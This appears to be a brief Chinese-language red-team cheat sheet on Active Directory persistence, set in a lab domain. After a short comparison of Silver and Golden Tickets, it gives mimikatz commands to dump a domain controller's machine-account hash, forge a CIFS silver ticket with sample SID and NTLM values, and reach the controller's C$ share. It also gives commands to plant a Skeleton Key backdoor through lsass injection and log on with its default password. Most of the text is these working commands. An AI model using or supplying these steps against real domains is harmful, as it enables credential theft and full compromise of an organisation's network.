白银票据

白银票据

黄金票据和白银票据的一些区别：Golden Ticket：伪造TGT，可以获取任何 Kerberos 服务权限，且由 krbtgt 的 hash 加密，金票在使用的过程需要和域控通信

白银票据：伪造 TGS ，只能访问指定的服务，且由服务账号（通常为计算机账户）的 Hash 加密 ，银票在使用的过程不需要同域控通信

#在域控上导出 机器账号 r-dc$ 的 HASH
mimikatz.exe log "privilege::debug" "sekurlsa::logonpasswords" exit

#获取信息
域sid:S-1-5-21-1582912704-266771287-3858088903
ntlm:19afb4d47fde634542e6062f728ab63e (rc4)

#利用 r-dc$ 的 Hash制作一张 cifs 服务的白银票据
mimikatz # kerberos::golden /domain:hacker.lab /sid:S-1-5-21-1582912704-266771287-3858088903 /target:r-dc.hacker.lab /service:cifs /rc4:19afb4d47fde634542e6062f728ab63e /user:administrator /ptt

#cifs是指的文件共享服务，有了 cifs 服务权限，就可以访问域控制器的文件系统
dir \\10.211.55.30\c$ 

skeleton key

skeleton key(万能钥匙)就是给所有域内用户添加一个相同的密码，域内所有的用户 都可以使用这个密码进行认证，同时原始密码也可以使用，其原理是对 lsass.exe 进行注 入，所以重启后会失效。

#在域控上安装 skeleton key
mimikatz.exe "privilege::debug" "misc::skeleton" 

#在域内其他机器尝试使用 skeleton key 去访问域控，默认添加的密码是 mimikatz
net use \\r-dc\c$ mimikatz /user:hacker\administrator